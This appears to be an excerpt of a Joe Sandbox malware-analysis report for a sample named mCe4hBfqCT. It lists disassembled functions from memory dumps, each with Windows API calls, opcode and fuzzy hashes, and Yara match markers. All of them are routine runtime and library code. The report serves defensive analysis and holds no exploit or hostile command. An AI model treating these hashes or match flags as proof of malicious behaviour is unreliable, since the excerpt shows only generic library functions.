                                                  Function 004192E9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                  • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                  • GetLastError.KERNEL32 ref: 004239B1
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                  • String ID:
                                                  • API String ID: 3735082963-0
                                                  • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                  • Instruction ID: 6dd5cecd5731d0fd3396096e4a73a475127880a88571f9a1564212530dcc10d0
                                                  • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                  • Instruction Fuzzy Hash: C9E02BF45003245EC310BF72AD4A66F3274790170AB600E2BF015D2192EEBCD1844A9C
                                                  Function 03029550 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03022979: TlsAlloc.KERNEL32(?,03020DC0), ref: 0302297F
                                                  • TlsAlloc.KERNEL32(?,03020DC0), ref: 03033C06
                                                  • GetLastError.KERNEL32 ref: 03033C18
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 03033C2E
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03033C3C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                  • String ID:
                                                  • API String ID: 3735082963-0
                                                  • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                  • Instruction ID: 004a548afb9decb0bb15952aeb2888969bd2221ab9cda80b2082dbfc0ac28d95
                                                  • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                  • Instruction Fuzzy Hash: DBE0687C501321AFC744FBB1ACC86BE7AACAA022027100E66F112C70A0EE38D248476C
                                                  Function 0041254D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B59), ref: 00412557
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B59), ref: 00412566
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                  • String ID:
                                                  • API String ID: 3016159387-0
                                                  • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                  • Instruction ID: 951ac86653187ea2db5183bbef748415e33b6f8be8890effbe132357fd44ea8b
                                                  • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                  • Instruction Fuzzy Hash: 69E04874A0010DABC714EFB5DF49AEF73BC7A00A45FA00466A501E2151EA6CDB04977D
                                                  Function 030227B4 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,03020DC0), ref: 030227BE
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,03020DC0), ref: 030227CD
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030227E3
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030227F1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                  • String ID:
                                                  • API String ID: 3016159387-0
                                                  • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                  • Instruction ID: 05263c7e7911039cd4fca5e6094f0a2c861ed1cd271721bca2fcb1d69968373a
                                                  • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                  • Instruction Fuzzy Hash: 30E04F7860121AA7CB40FBF59D49AAF77BC6A00A06B600866F505E6050EB68EB089779
                                                  Function 004126A5 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                  • GetLastError.KERNEL32 ref: 004126BD
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                  • String ID:
                                                  • API String ID: 4286982218-0
                                                  • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                  • Instruction ID: d6ad487b4c18070c6cf6a1f44c15ecb3f6d05e9c3d6252d545de6a15e1df0045
                                                  • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                  • Instruction Fuzzy Hash: BBE086746001196BCB24BF61DE06BFF376C7B00745F50082BB515D50A1EF7DD56486AC
                                                  Function 0041276B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                  • String ID:
                                                  • API String ID: 1964976909-0
                                                  • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                  • Instruction ID: 402fe0f5bbe0f151a29ab6283833ac733f3ad497baf8671b47c41dc8f6c9e06d
                                                  • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                  • Instruction Fuzzy Hash: F7E086746001196BDB20BF65DE09BFF37AC7F00745F50082AB515D50A1EE7DD564869C
                                                  Function 0302290C Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • SetThreadPriority.KERNEL32(?,?), ref: 03022918
                                                  • GetLastError.KERNEL32 ref: 03022924
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0302293A
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03022948
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                  • String ID:
                                                  • API String ID: 4286982218-0
                                                  • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                  • Instruction ID: e057da1b19d0f7ce6227a299668ff88c24041382b6bb876ea81c816d3f510e40
                                                  • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                  • Instruction Fuzzy Hash: 65E08634101229B7CB54FFA1CC05BBF7BACAB01641B544D65F919D50A0EB35D104975C
                                                  Function 030229D2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • TlsSetValue.KERNEL32(?,00000000,03027BF8,00000000,?,?,03020DC0,?,?,?,00000000,?,00000000), ref: 030229DE
                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 030229EA
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 03022A00
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03022A0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                  • String ID:
                                                  • API String ID: 1964976909-0
                                                  • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                  • Instruction ID: 5a4559b9c76a5f0ef3069614e27966552609c879d438217b90cf6d2241199171
                                                  • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                  • Instruction Fuzzy Hash: B7E0863410122967DB50FFA5CC09BBF7BACAF00641B544D25F919D50A0DB39D1149798
                                                  Function 00412712 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                  • GetLastError.KERNEL32 ref: 00412725
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                  • String ID:
                                                  • API String ID: 3103352999-0
                                                  • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                  • Instruction ID: 41d26ccb9910f396398e3bce7d3f30876e3ac6ee5b10193dd838f65c512c27a9
                                                  • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                  • Instruction Fuzzy Hash: F8E0C274500119678728BB759E0AABF73687A01759BA00A6BF031D20E1EEACD45842AC
                                                  Function 03022979 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • TlsAlloc.KERNEL32(?,03020DC0), ref: 0302297F
                                                  • GetLastError.KERNEL32 ref: 0302298C
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030229A2
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030229B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                  • String ID:
                                                  • API String ID: 3103352999-0
                                                  • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                  • Instruction ID: f41db5a2379d23260eca06c95bb3a767dd221c2c6b8b66703f7ad7fa412458de
                                                  • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                  • Instruction Fuzzy Hash: C3E02B3400122567C754FBF59C48BBF77AC6B02722B640F2AF065D70E0EB68D10843AD
                                                  Function 0042F09D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                  • Instruction ID: ab4d94818e4fdfc694d7abd88a5ac0d422e49d456205366947d10b0b41845edd
                                                  • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                  • Instruction Fuzzy Hash: CA518D61B04202D6CB117714E90137BABB0EB54B10FE4597FF491463A9EE2E8CA99A4F
                                                  Function 0043AE89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                  • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                  • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                  Function 0304B0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0304B34B,?,00000050,?,?,?,?,?), ref: 0304B1CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                  • Instruction ID: bd603061f8c2bb78d982826715a913ee606507de65f28b3a0038d5f14502bb35
                                                  • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                  • Instruction Fuzzy Hash: E22165E2A42104A6EB64CE5C8D01B9773DEEB85A51F8A8574ED8BD7120F731DB01C290
                                                  Function 00401F26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                  • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: EncodersGdipImage$Size
                                                  • String ID: image/png
                                                  • API String ID: 864223233-2966254431
                                                  • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                  • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                  • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                  • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                  Function 0301F1B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetLastError.KERNEL32(0000000D,?,0301E0CD,0301C8E5,?,?,00000000,?,0301C7B5,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0301C8E5), ref: 0301F236
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID: 11@
                                                  • API String ID: 1452528299-1785270423
                                                  • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                  • Instruction ID: 18f04398a63b1543eba4a64272ebc63e6e85c99d0425ad440d428a1e30d0eee1
                                                  • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                  • Instruction Fuzzy Hash: 7311A13A301227AFCF169F64DC4896EFBA9FF09B15B044538FA15D6210CB709820DBE0
                                                  Function 0302DB74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03020F85: RtlEnterCriticalSection.NTDLL ref: 03020F86
                                                  • List.LIBCONCRT ref: 0302DBCF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterListSection
                                                  • String ID: +$D$11@
                                                  • API String ID: 2909958271-3688954461
                                                  • Opcode ID: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                  • Instruction ID: 25c27eb6a4931b0ad2e64043274d15251975a820620ef35d3a94079086425b70
                                                  • Opcode Fuzzy Hash: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                  • Instruction Fuzzy Hash: 2E212E79A01219CFCF05EF68C5949ADBBB1FF88310B158469E916AB351C770EE05CF90
                                                  Function 00410EB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: SpinWait
                                                  • String ID: 11@
                                                  • API String ID: 2810355486-1785270423
                                                  • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                  • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                  • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                  • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                  Function 0302111F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SpinWait
                                                  • String ID: 11@
                                                  • API String ID: 2810355486-1785270423
                                                  • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                  • Instruction ID: 34dadf56b2964a9927478f42fb483e81654042f26d6b7b8ed9d314057f2e7baa
                                                  • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                  • Instruction Fuzzy Hash: 5501F1319126329FCB6CCF3DD90866ABFD4EB02620F088869D41683A60C7B1E840CB80
                                                  Function 004353E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: String
                                                  • String ID: 11@$LCMapStringEx
                                                  • API String ID: 2568140703-3516914342
                                                  • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                  • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                  • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                  • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                  Function 0040C535 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ___std_exception_destroy
                                                  • String ID: f(@$ios_base::failbit set
                                                  • API String ID: 4194217158-3705395444
                                                  • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                  • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
                                                  • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                  • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                  Function 0302DC92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0302DCDA
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0302DCE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                  • String ID: 11@
                                                  • API String ID: 1687795959-1785270423
                                                  • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                  • Instruction ID: 28a39172c84847c7fbac730aef9033cf552f5e3a03f15a4071e6c95aa08735ec
                                                  • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                  • Instruction Fuzzy Hash: 21F059397006165BCB04EB58DC84C6DFBADAF86A6132000B6F902D7351CBB0EE058794
                                                  Function 0043524A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: DefaultUser
                                                  • String ID: 11@$GetUserDefaultLocaleName
                                                  • API String ID: 3358694519-96072240
                                                  • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                  • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                  • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                  • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                  Function 00435313 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: LocaleValid
                                                  • String ID: 11@$IsValidLocaleName
                                                  • API String ID: 1901932003-3041995494
